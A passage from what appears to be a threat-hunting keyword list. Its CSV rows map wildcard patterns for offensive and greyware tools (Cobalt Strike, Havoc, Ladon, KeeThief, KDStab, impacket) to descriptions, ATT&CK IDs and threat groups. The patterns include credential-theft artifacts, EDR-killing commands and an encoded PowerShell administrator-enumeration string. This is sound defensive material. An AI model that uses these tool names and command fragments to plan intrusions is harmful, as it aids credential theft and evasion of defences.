T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*jump-exec psexec *,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*jump-exec scshell*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,0,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*JunctionFolder.exe*,offensive_tool_keyword,JunctionFolder,Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.,T1547.001 - T1574.001 - T1204.002,TA0005 - TA0004,N/A,N/A,Persistence - Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*--just-clean*cleaning/to_clean.txt*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*jweny/zabbix-saml-bypass-exp*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0001 - TA0002,N/A,N/A,Exploitation tools,https://github.com/jweny/zabbix-saml-bypass-exp,1,1,N/A,N/A,1,94,42,2022-02-21T04:27:48Z,2022-02-18T08:38:53Z -*jwt_tool*,offensive_tool_keyword,jwt_tool,jwt_tool.py is a toolkit for validating. forging. scanning and tampering JWTs (JSON Web Tokens).,T1210.001 - T1201 - T1059 - T1222,TA0002 - TA0001 - TA0007,N/A,N/A,Exploitation tools,https://github.com/ticarpi/jwt_tool,1,0,N/A,N/A,10,4461,600,2023-06-26T14:55:14Z,2017-01-23T21:13:50Z -*-K lsass_loot*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*-k -no-pass -p '' --auth-method kerberos*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*k4yt3x/orbitaldump*,offensive_tool_keyword,orbitaldump,A simple multi-threaded distributed SSH brute-forcing tool written in Python.,T1110,TA0006,N/A,N/A,Exploitation tools,https://github.com/k4yt3x/orbitaldump,1,1,N/A,N/A,5,440,86,2022-10-30T23:40:57Z,2021-06-06T17:48:19Z -*K8_CS_*.rar*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z -*k8gege.org/*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*k8gege/Ladon*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*K8Ladon.sln*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*KABHAGUAdAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIAAtAE4AYQBtAGUAIABBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAbgBhAG0AZQApACAALQBjAG8AbgB0AGEAaQBuAHMAIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQAuAG4AYQBtAGUA*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*kali-*.deb*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*kali-anonsurf*,offensive_tool_keyword,kali-anonsurf,Anonsurf will anonymize the entire system under TOR using IPTables. It will also allow you to start and stop i2p as well.,T1568 - T1102 - T1055 - T1070,TA0002 - TA0008 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/Und3rf10w/kali-anonsurf,1,1,N/A,N/A,10,1268,427,2023-05-18T00:25:57Z,2015-08-19T04:57:16Z -*KaliLadon.*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*kali-linux*.7z*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*kali-linux*.img*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*kali-linux*.iso*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*kali-linux-*.torrent*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*kali-linux-*.vmdk*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*kali-linux-*.vmwarevm*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*kali-linux-*.vmx*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*kali-linux-*-installer-amd64.iso*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*kali-linux-*-installer-everything-amd64.iso.torrent*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*kali-linux-*-live-everything-amd64.iso.torrent*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*kali-linux-*-raspberry-pi-armhf.img.xz*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*kali-linux-*-virtualbox-amd64.ova*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*kali-linux-*-vmware-amd64.7z*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*kalitorify*,offensive_tool_keyword,kalitorify,kalitorify is a shell script for Kali Linux which use iptables settings to create a Transparent Proxy through the Tor Network. the program also allows you to perform various checks like checking the Tor Exit Node (i.e. your public IP when you are under Tor proxy). or if Tor has been configured correctly checking service and network settings.,T1090 - T1132 - T1046 - T1016,TA0003 - TA0011 - TA0040,N/A,N/A,Data Exfiltration,https://github.com/brainfucksec/kalitorify,1,0,N/A,N/A,9,897,214,2022-05-31T08:47:52Z,2016-02-03T20:42:46Z -*kaluche/bloodhound-quickwin*,offensive_tool_keyword,bloodhound-quickwin,Simple script to extract useful informations from the combo BloodHound + Neo4j,T1087 - T1087.001 - T1018 - T1069 - T1069.002,TA0007 - TA0003 - TA0004,N/A,N/A,AD Enumeration,https://github.com/kaluche/bloodhound-quickwin,1,1,N/A,6,2,162,17,2023-07-17T14:31:51Z,2021-02-16T16:04:16Z -*kancotdiq/wpaf*,offensive_tool_keyword,wpaf,WordPress admin finder,T1596,TA0007,N/A,N/A,Web Attacks,https://github.com/kancotdiq/wpaf,1,0,N/A,N/A,1,51,8,2018-07-12T04:55:58Z,2018-07-11T18:09:11Z -*karendm/ADHunt*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,1,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -*Karmaleon.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*karmaSMB.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*katoolin*toollist.py*,offensive_tool_keyword,katoolin3,Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.,T1203 - T1090 - T1020,TA0006 - TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/s-h-3-l-l/katoolin3,1,1,N/A,N/A,4,315,103,2020-08-05T17:21:00Z,2019-09-05T13:14:46Z -*katoolin3.py*,offensive_tool_keyword,katoolin3,Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.,T1203 - T1090 - T1020,TA0006 - TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/s-h-3-l-l/katoolin3,1,1,N/A,N/A,4,315,103,2020-08-05T17:21:00Z,2019-09-05T13:14:46Z -*KatzSystemArchitecture*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*KBDPAYLOAD.dll*,offensive_tool_keyword,cobaltstrike,Achieve execution using a custom keyboard layout,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence,1,1,N/A,10,10,156,30,2023-05-23T20:34:26Z,2022-03-13T17:43:29Z -*kcdahmgmaagjhocpipbodaokikjkampi*,greyware_tool_keyword,Hola VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*kchocjcihdgkoplngjemhpplmmloanja*,greyware_tool_keyword,IPBurger Proxy & VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*kcndmbbelllkmioekdagahekgimemejo*,greyware_tool_keyword,VPN.AC,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*KcpPassword.cs*,offensive_tool_keyword,Keethief,Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.,T1003 - T1213 - T1215 - T1566,TA0005 - TA0007 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/KeeThief,1,1,N/A,N/A,9,863,151,2020-11-18T18:35:21Z,2016-07-10T19:11:23Z -*kdcdump2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*kdstab * /CHECK*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,0,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*kdstab * /CLOSE*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 